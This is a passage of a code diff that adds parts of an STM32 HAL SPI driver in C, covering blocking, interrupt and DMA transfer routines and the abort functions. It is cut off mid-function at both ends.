hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + /* Next Data is a reception (Rx). Tx not allowed */ + txallowed = 0U; + +#if (USE_SPI_CRC != 0U) + /* Enable CRC Transmission */ + if ((hspi->TxXferCount == 0U) && (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE)) + { + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + } + + /* Check RXNE flag */ + if ((__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_RXNE)) && (hspi->RxXferCount > 0U)) + { + *((uint16_t *)hspi->pRxBuffPtr) = (uint16_t)hspi->Instance->DR; + hspi->pRxBuffPtr += sizeof(uint16_t); + hspi->RxXferCount--; + /* Next Data is a Transmission (Tx). Tx is allowed */ + txallowed = 1U; + } + if (((HAL_GetTick() - tickstart) >= Timeout) && (Timeout != HAL_MAX_DELAY)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + /* Transmit and Receive data in 8 Bit mode */ + else + { + if ((hspi->Init.Mode == SPI_MODE_SLAVE) || (initial_TxXferCount == 0x01U)) + { + *((__IO uint8_t *)&hspi->Instance->DR) = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint8_t); + hspi->TxXferCount--; + } + while ((hspi->TxXferCount > 0U) || (hspi->RxXferCount > 0U)) + { + /* Check TXE flag */ + if ((__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_TXE)) && (hspi->TxXferCount > 0U) && (txallowed == 1U)) + { + *(__IO uint8_t *)&hspi->Instance->DR = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr++; + hspi->TxXferCount--; + /* Next Data is a reception (Rx). Tx not allowed */ + txallowed = 0U; + +#if (USE_SPI_CRC != 0U) + /* Enable CRC Transmission */ + if ((hspi->TxXferCount == 0U) && (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE)) + { + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + } + + /* Wait until RXNE flag is reset */ + if ((__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_RXNE)) && (hspi->RxXferCount > 0U)) + { + (*(uint8_t *)hspi->pRxBuffPtr) = hspi->Instance->DR; + hspi->pRxBuffPtr++; + hspi->RxXferCount--; + /* Next Data is a Transmission (Tx). Tx is allowed */ + txallowed = 1U; + } + if ((((HAL_GetTick() - tickstart) >= Timeout) && ((Timeout != HAL_MAX_DELAY))) || (Timeout == 0U)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + +#if (USE_SPI_CRC != 0U) + /* Read CRC from DR to close CRC calculation process */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Wait until TXE flag */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, SET, Timeout, tickstart) != HAL_OK) + { + /* Error on the CRC reception */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + errorcode = HAL_TIMEOUT; + goto error; + } + /* Read CRC */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + } + + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + /* Clear CRC Flag */ + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + + errorcode = HAL_ERROR; + } +#endif /* USE_SPI_CRC */ + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, Timeout, tickstart) != HAL_OK) + { + errorcode = HAL_ERROR; + hspi->ErrorCode = HAL_SPI_ERROR_FLAG; + goto error; + } + + /* Clear overrun flag in 2 Lines communication mode because received is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + +error : + hspi->State = HAL_SPI_STATE_READY; + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Transmit an amount of data in non-blocking mode with Interrupt. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @param Size amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Transmit_IT(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES_OR_1LINE(hspi->Init.Direction)); + + /* Process Locked */ + __HAL_LOCK(hspi); + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_TX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pTxBuffPtr = (uint8_t *)pData; + hspi->TxXferSize = Size; + hspi->TxXferCount = Size; + + /* Init field not used in handle to zero */ + hspi->pRxBuffPtr = (uint8_t *)NULL; + hspi->RxXferSize = 0U; + hspi->RxXferCount = 0U; + hspi->RxISR = NULL; + + /* Set the function for IT treatment */ + if (hspi->Init.DataSize > SPI_DATASIZE_8BIT) + { + hspi->TxISR = SPI_TxISR_16BIT; + } + else + { + hspi->TxISR = SPI_TxISR_8BIT; + } + + /* Configure communication direction : 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_TX(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Enable TXE and ERR interrupt */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_TXE | SPI_IT_ERR)); + + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + +error : + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Receive an amount of data in non-blocking mode with Interrupt. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @param Size amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Receive_IT(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef errorcode = HAL_OK; + + if ((hspi->Init.Direction == SPI_DIRECTION_2LINES) && (hspi->Init.Mode == SPI_MODE_MASTER)) + { + hspi->State = HAL_SPI_STATE_BUSY_RX; + /* Call transmit-receive function to send Dummy data on Tx line and generate clock on CLK line */ + return HAL_SPI_TransmitReceive_IT(hspi, pData, pData, Size); + } + + /* Process Locked */ + __HAL_LOCK(hspi); + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_RX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pRxBuffPtr = (uint8_t *)pData; + hspi->RxXferSize = Size; + hspi->RxXferCount = Size; + + /* Init field not used in handle to zero */ + hspi->pTxBuffPtr = (uint8_t *)NULL; + hspi->TxXferSize = 0U; + hspi->TxXferCount = 0U; + hspi->TxISR = NULL; + + /* Set the function for IT treatment */ + if (hspi->Init.DataSize > SPI_DATASIZE_8BIT) + { + hspi->RxISR = SPI_RxISR_16BIT; + } + else + { + hspi->RxISR = SPI_RxISR_8BIT; + } + + /* Configure communication direction : 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_RX(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Enable TXE and ERR interrupt */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_RXNE | SPI_IT_ERR)); + + /* Note : The SPI must be enabled after unlocking current process + to avoid the risk of SPI interrupt handle execution before current + process unlock */ + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + +error : + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Transmit and Receive an amount of data in non-blocking mode with Interrupt. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pTxData pointer to transmission data buffer + * @param pRxData pointer to reception data buffer + * @param Size amount of data to be sent and received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_TransmitReceive_IT(SPI_HandleTypeDef *hspi, uint8_t *pTxData, uint8_t *pRxData, uint16_t Size) +{ + uint32_t tmp_mode; + HAL_SPI_StateTypeDef tmp_state; + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES(hspi->Init.Direction)); + + /* Process locked */ + __HAL_LOCK(hspi); + + /* Init temporary variables */ + tmp_state = hspi->State; + tmp_mode = hspi->Init.Mode; + + if (!((tmp_state == HAL_SPI_STATE_READY) || \ + ((tmp_mode == SPI_MODE_MASTER) && (hspi->Init.Direction == SPI_DIRECTION_2LINES) && (tmp_state == HAL_SPI_STATE_BUSY_RX)))) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Don't overwrite in case of HAL_SPI_STATE_BUSY_RX */ + if (hspi->State != HAL_SPI_STATE_BUSY_RX) + { + hspi->State = HAL_SPI_STATE_BUSY_TX_RX; + } + + /* Set the transaction information */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pTxBuffPtr = (uint8_t *)pTxData; + hspi->TxXferSize = Size; + hspi->TxXferCount = Size; + hspi->pRxBuffPtr = (uint8_t *)pRxData; + hspi->RxXferSize = Size; + hspi->RxXferCount = Size; + + /* Set the function for IT treatment */ + if (hspi->Init.DataSize > SPI_DATASIZE_8BIT) + { + hspi->RxISR = SPI_2linesRxISR_16BIT; + hspi->TxISR = SPI_2linesTxISR_16BIT; + } + else + { + hspi->RxISR = SPI_2linesRxISR_8BIT; + hspi->TxISR = SPI_2linesTxISR_8BIT; + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Enable TXE, RXNE and ERR interrupt */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_TXE | SPI_IT_RXNE | SPI_IT_ERR)); + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + +error : + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Transmit an amount of data in non-blocking mode with DMA. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @param Size amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Transmit_DMA(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check tx dma handle */ + assert_param(IS_SPI_DMA_HANDLE(hspi->hdmatx)); + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES_OR_1LINE(hspi->Init.Direction)); + + /* Process Locked */ + __HAL_LOCK(hspi); + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_TX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pTxBuffPtr = (uint8_t *)pData; + hspi->TxXferSize = Size; + hspi->TxXferCount = Size; + + /* Init field not used in handle to zero */ + hspi->pRxBuffPtr = (uint8_t *)NULL; + hspi->TxISR = NULL; + hspi->RxISR = NULL; + hspi->RxXferSize = 0U; + hspi->RxXferCount = 0U; + + /* Configure communication direction : 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_TX(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Set the SPI TxDMA Half transfer complete callback */ + hspi->hdmatx->XferHalfCpltCallback = SPI_DMAHalfTransmitCplt; + + /* Set the SPI TxDMA transfer complete callback */ + hspi->hdmatx->XferCpltCallback = SPI_DMATransmitCplt; + + /* Set the DMA error callback */ + hspi->hdmatx->XferErrorCallback = SPI_DMAError; + + /* Set the DMA AbortCpltCallback */ + hspi->hdmatx->XferAbortCallback = NULL; + + /* Enable the Tx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hspi->hdmatx, (uint32_t)hspi->pTxBuffPtr, (uint32_t)&hspi->Instance->DR, + hspi->TxXferCount)) + { + /* Update SPI error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + + hspi->State = HAL_SPI_STATE_READY; + goto error; + } + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + + /* Enable the SPI Error Interrupt Bit */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_ERR)); + + /* Enable Tx DMA Request */ + SET_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN); + +error : + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Receive an amount of data in non-blocking mode with DMA. + * @note In case of MASTER mode and SPI_DIRECTION_2LINES direction, hdmatx shall be defined. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @note When the CRC feature is enabled the pData Length must be Size + 1. + * @param Size amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Receive_DMA(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check rx dma handle */ + assert_param(IS_SPI_DMA_HANDLE(hspi->hdmarx)); + + if ((hspi->Init.Direction == SPI_DIRECTION_2LINES) && (hspi->Init.Mode == SPI_MODE_MASTER)) + { + hspi->State = HAL_SPI_STATE_BUSY_RX; + + /* Check tx dma handle */ + assert_param(IS_SPI_DMA_HANDLE(hspi->hdmatx)); + + /* Call transmit-receive function to send Dummy data on Tx line and generate clock on CLK line */ + return HAL_SPI_TransmitReceive_DMA(hspi, pData, pData, Size); + } + + /* Process Locked */ + __HAL_LOCK(hspi); + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_RX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pRxBuffPtr = (uint8_t *)pData; + hspi->RxXferSize = Size; + hspi->RxXferCount = Size; + + /*Init field not used in handle to zero */ + hspi->RxISR = NULL; + hspi->TxISR = NULL; + hspi->TxXferSize = 0U; + hspi->TxXferCount = 0U; + + /* Configure communication direction : 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_RX(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Set the SPI RxDMA Half transfer complete callback */ + hspi->hdmarx->XferHalfCpltCallback = SPI_DMAHalfReceiveCplt; + + /* Set the SPI Rx DMA transfer complete callback */ + hspi->hdmarx->XferCpltCallback = SPI_DMAReceiveCplt; + + /* Set the DMA error callback */ + hspi->hdmarx->XferErrorCallback = SPI_DMAError; + + /* Set the DMA AbortCpltCallback */ + hspi->hdmarx->XferAbortCallback = NULL; + + /* Enable the Rx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hspi->hdmarx, (uint32_t)&hspi->Instance->DR, (uint32_t)hspi->pRxBuffPtr, + hspi->RxXferCount)) + { + /* Update SPI error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + + hspi->State = HAL_SPI_STATE_READY; + goto error; + } + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + + /* Enable the SPI Error Interrupt Bit */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_ERR)); + + /* Enable Rx DMA Request */ + SET_BIT(hspi->Instance->CR2, SPI_CR2_RXDMAEN); + +error: + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Transmit and Receive an amount of data in non-blocking mode with DMA. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pTxData pointer to transmission data buffer + * @param pRxData pointer to reception data buffer + * @note When the CRC feature is enabled the pRxData Length must be Size + 1 + * @param Size amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_TransmitReceive_DMA(SPI_HandleTypeDef *hspi, uint8_t *pTxData, uint8_t *pRxData, + uint16_t Size) +{ + uint32_t tmp_mode; + HAL_SPI_StateTypeDef tmp_state; + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check rx & tx dma handles */ + assert_param(IS_SPI_DMA_HANDLE(hspi->hdmarx)); + assert_param(IS_SPI_DMA_HANDLE(hspi->hdmatx)); + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES(hspi->Init.Direction)); + + /* Process locked */ + __HAL_LOCK(hspi); + + /* Init temporary variables */ + tmp_state = hspi->State; + tmp_mode = hspi->Init.Mode; + + if (!((tmp_state == HAL_SPI_STATE_READY) || + ((tmp_mode == SPI_MODE_MASTER) && (hspi->Init.Direction == SPI_DIRECTION_2LINES) && (tmp_state == HAL_SPI_STATE_BUSY_RX)))) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Don't overwrite in case of HAL_SPI_STATE_BUSY_RX */ + if (hspi->State != HAL_SPI_STATE_BUSY_RX) + { + hspi->State = HAL_SPI_STATE_BUSY_TX_RX; + } + + /* Set the transaction information */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pTxBuffPtr = (uint8_t *)pTxData; + hspi->TxXferSize = Size; + hspi->TxXferCount = Size; + hspi->pRxBuffPtr = (uint8_t *)pRxData; + hspi->RxXferSize = Size; + hspi->RxXferCount = Size; + + /* Init field not used in handle to zero */ + hspi->RxISR = NULL; + hspi->TxISR = NULL; + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Check if we are in Rx only or in Rx/Tx Mode and configure the DMA transfer complete callback */ + if (hspi->State == HAL_SPI_STATE_BUSY_RX) + { + /* Set the SPI Rx DMA Half transfer complete callback */ + hspi->hdmarx->XferHalfCpltCallback = SPI_DMAHalfReceiveCplt; + hspi->hdmarx->XferCpltCallback = SPI_DMAReceiveCplt; + } + else + { + /* Set the SPI Tx/Rx DMA Half transfer complete callback */ + hspi->hdmarx->XferHalfCpltCallback = SPI_DMAHalfTransmitReceiveCplt; + hspi->hdmarx->XferCpltCallback = SPI_DMATransmitReceiveCplt; + } + + /* Set the DMA error callback */ + hspi->hdmarx->XferErrorCallback = SPI_DMAError; + + /* Set the DMA AbortCpltCallback */ + hspi->hdmarx->XferAbortCallback = NULL; + + /* Enable the Rx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hspi->hdmarx, (uint32_t)&hspi->Instance->DR, (uint32_t)hspi->pRxBuffPtr, + hspi->RxXferCount)) + { + /* Update SPI error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + + hspi->State = HAL_SPI_STATE_READY; + goto error; + } + + /* Enable Rx DMA Request */ + SET_BIT(hspi->Instance->CR2, SPI_CR2_RXDMAEN); + + /* Set the SPI Tx DMA transfer complete callback as NULL because the communication closing + is performed in DMA reception complete callback */ + hspi->hdmatx->XferHalfCpltCallback = NULL; + hspi->hdmatx->XferCpltCallback = NULL; + hspi->hdmatx->XferErrorCallback = NULL; + hspi->hdmatx->XferAbortCallback = NULL; + + /* Enable the Tx DMA Stream/Channel */ + if (HAL_OK != HAL_DMA_Start_IT(hspi->hdmatx, (uint32_t)hspi->pTxBuffPtr, (uint32_t)&hspi->Instance->DR, + hspi->TxXferCount)) + { + /* Update SPI error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + + hspi->State = HAL_SPI_STATE_READY; + goto error; + } + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + /* Enable the SPI Error Interrupt Bit */ + __HAL_SPI_ENABLE_IT(hspi, (SPI_IT_ERR)); + + /* Enable Tx DMA Request */ + SET_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN); + +error : + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Abort ongoing transfer (blocking mode). + * @param hspi SPI handle. + * @note This procedure could be used for aborting any ongoing transfer (Tx and Rx), + * started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable SPI Interrupts (depending of transfer direction) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Abort(SPI_HandleTypeDef *hspi) +{ + HAL_StatusTypeDef errorcode; + __IO uint32_t count; + __IO uint32_t resetcount; + + /* Initialized local variable */ + errorcode = HAL_OK; + resetcount = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + count = resetcount; + + /* Clear ERRIE interrupt to avoid error interrupts generation during Abort procedure */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_ERRIE); + + /* Disable TXEIE, RXNEIE and ERRIE(mode fault event, overrun error, TI frame error) interrupts */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_TXEIE)) + { + hspi->TxISR = SPI_AbortTx_ISR; + /* Wait HAL_SPI_STATE_ABORT state */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while (hspi->State != HAL_SPI_STATE_ABORT); + /* Reset Timeout Counter */ + count = resetcount; + } + + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_RXNEIE)) + { + hspi->RxISR = SPI_AbortRx_ISR; + /* Wait HAL_SPI_STATE_ABORT state */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while (hspi->State != HAL_SPI_STATE_ABORT); + /* Reset Timeout Counter */ + count = resetcount; + } + + /* Disable the SPI DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_TXDMAEN)) + { + /* Abort the SPI DMA Tx Stream/Channel : use blocking DMA Abort API (no callback) */ + if (hspi->hdmatx != NULL) + { + /* Set the SPI DMA Abort callback : + will lead to call HAL_SPI_AbortCpltCallback() at end of DMA abort procedure */ + hspi->hdmatx->XferAbortCallback = NULL; + + /* Abort DMA Tx Handle linked to SPI Peripheral */ + if (HAL_DMA_Abort(hspi->hdmatx) != HAL_OK) + { + hspi->ErrorCode = HAL_SPI_ERROR_ABORT; + } + + /* Disable Tx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, (SPI_CR2_TXDMAEN)); + + /* Wait until TXE flag is set */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while ((hspi->Instance->SR & SPI_FLAG_TXE) == RESET); + } + } + + /* Disable the SPI DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_RXDMAEN)) + { + /* Abort the SPI DMA Rx Stream/Channel : use blocking DMA Abort API (no callback) */ + if (hspi->hdmarx != NULL) + { + /* Set the SPI DMA Abort callback : + will lead to call HAL_SPI_AbortCpltCallback() at end of DMA abort procedure */ + hspi->hdmarx->XferAbortCallback = NULL; + + /* Abort DMA Rx Handle linked to SPI Peripheral */ + if (HAL_DMA_Abort(hspi->hdmarx) != HAL_OK) + { + hspi->ErrorCode = HAL_SPI_ERROR_ABORT; + } + + /* Disable peripheral */ + __HAL_SPI_DISABLE(hspi); + + /* Disable Rx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, (SPI_CR2_RXDMAEN)); + } + } + /* Reset Tx and Rx transfer counters */ + hspi->RxXferCount = 0U; + hspi->TxXferCount = 0U; + + /* Check error during Abort procedure */ + if (hspi->ErrorCode == HAL_SPI_ERROR_ABORT) + { + /* return HAL_Error in case of error during Abort procedure */ + errorcode = HAL_ERROR; + } + else + { + /* Reset errorCode */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + } + + /* Clear the Error flags in the SR register */ + __HAL_SPI_CLEAR_OVRFLAG(hspi); + __HAL_SPI_CLEAR_FREFLAG(hspi); + + /* Restore hspi->state to ready */ + hspi->State = HAL_SPI_STATE_READY; + + return errorcode; +} + +/** + * @brief Abort ongoing transfer (Interrupt mode). + * @param hspi SPI handle. + * @note This procedure could be used for aborting any ongoing transfer (Tx and Rx), + * started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable SPI Interrupts (depending of transfer direction) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Abort_IT(SPI_HandleTypeDef *hspi) +{ + HAL_StatusTypeDef errorcode; + uint32_t abortcplt ; + __IO uint32_t count; + __IO uint32_t resetcount; + + /* Initialized local variable */ + errorcode = HAL_OK; + abortcplt = 1U; + resetcount = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + count = resetcount; + + /* Clear ERRIE interrupt to avoid error interrupts generation during Abort procedure */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_ERRIE); + + /* Change Rx and Tx Irq Handler to Disable TXEIE, RXNEIE and ERRIE interrupts */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_TXEIE)) + { + hspi->TxISR = SPI_AbortTx_ISR; + /* Wait HAL_SPI_STATE_ABORT state */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while (hspi->State != HAL_SPI_STATE_ABORT); + /* Reset Timeout Counter */ + count = resetcount; + } + + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_RXNEIE)) + { + hspi->RxISR = SPI_AbortRx_ISR; + /* Wait HAL_SPI_STATE_ABORT state */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while (hspi->State != HAL_SPI_STATE_ABORT); + /* Reset Timeout Counter */ + count = resetcount; + } + + /* If DMA Tx and/or DMA Rx Handles are associated to SPI Handle, DMA Abort complete callbacks should be initialised + before any call to DMA Abort functions */ + /* DMA Tx Handle is valid */ + if (hspi->hdmatx != NULL) + { + /* Set DMA Abort Complete callback if UART DMA Tx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_TXDMAEN)) + { + hspi->hdmatx->XferAbortCallback = SPI_DMATxAbortCallback; + } + else + { + hspi->hdmatx->XferAbortCallback = NULL; + } + } + /* DMA Rx Handle is valid */ + if 